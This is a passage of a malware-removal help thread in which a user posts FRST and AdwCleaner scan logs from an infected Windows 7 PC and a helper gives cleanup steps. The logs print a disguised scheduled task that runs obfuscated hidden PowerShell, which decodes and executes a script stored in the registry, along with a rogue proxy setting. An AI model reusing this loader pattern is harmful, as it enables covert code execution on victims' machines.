2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-20 00:01 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-20 00:01 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================

Re: Logging in to FB, windows opening in the browser

Posted: 23 Nov 2023 22:01
by Rudy
Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I Agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP just launch it with a double-click)
click Scan Now, then Clean and Repair
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply

Re: Logging in to FB, windows opening in the browser

Posted: 25 Nov 2023 10:43
by mivefe5888
# -------------------------------
# Malwarebytes AdwCleaner 8.4.0.0
# -------------------------------
# Build: 08-30-2022
# Database: 2023-07-19.3 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 11-24-2023
# Duration: 00:01:04
# OS: Windows 7 Service Pack 1
# Scanned: 32102
# Detected: 15


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Trojan.LVBP.ED C:\Program Files (x86)\Object

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.QuickStart pelmeidfhdlhlbjimpabfcbnnojbboma

***** [ Chromium URLs ] *****

PUP.Optional.Conduit http://search.conduit.com/?ctid=CT33218 ... 7BBE&SSPV=
PUP.Optional.Legacy Search Here
PUP.Optional.Legacy Trovi search
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ4Y3Y2NT
PUP.Optional.Legacy http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.MySearch Search Here
PUP.Optional.Trovi Trovi search
PUP.Optional.Trovi http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.


AdwCleaner[S00].txt - [3231 octets] - [12/07/2019 19:54:44]
AdwCleaner[C00].txt - [3181 octets] - [12/07/2019 19:55:17]
AdwCleaner[S01].txt - [4123 octets] - [06/06/2021 17:24:21]
AdwCleaner[C01].txt - [3945 octets] - [06/06/2021 17:27:48]
AdwCleaner[S02].txt - [3009 octets] - [29/07/2021 16:20:39]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S03].txt ##########

Re: Logging in to FB, windows opening in the browser

Posted: 25 Nov 2023 11:05
by Rudy
Delete the detected items (move them to quarantine), restart, and post new FRST+Addition logs.

Re: Logging in to FB, windows opening in the browser

Posted: 25 Nov 2023 12:21
by mivefe5888
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (25-11-2023 11:43:28)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\CEP\CEPHtmlEngine\CEPHtmlEngine.exe <3>
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\DynamicLinkMediaServer\32\dynamiclinkmanager.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Joyent, Inc -> Joyent, Inc) C:\Program Files\Adobe\Adobe Photoshop CC 2015\node.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Adobe Systems Incorporated -> Adobe Systems, Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Malwarebytes Inc. -> Malwarebytes) I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <57>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {64C634CD-B1AF-4B19-894B-BA25119772A0} - System32\Tasks\AdwCleaner_onReboot => I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe [8791352 2023-11-24] (Malwarebytes Inc. -> Malwarebytes)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
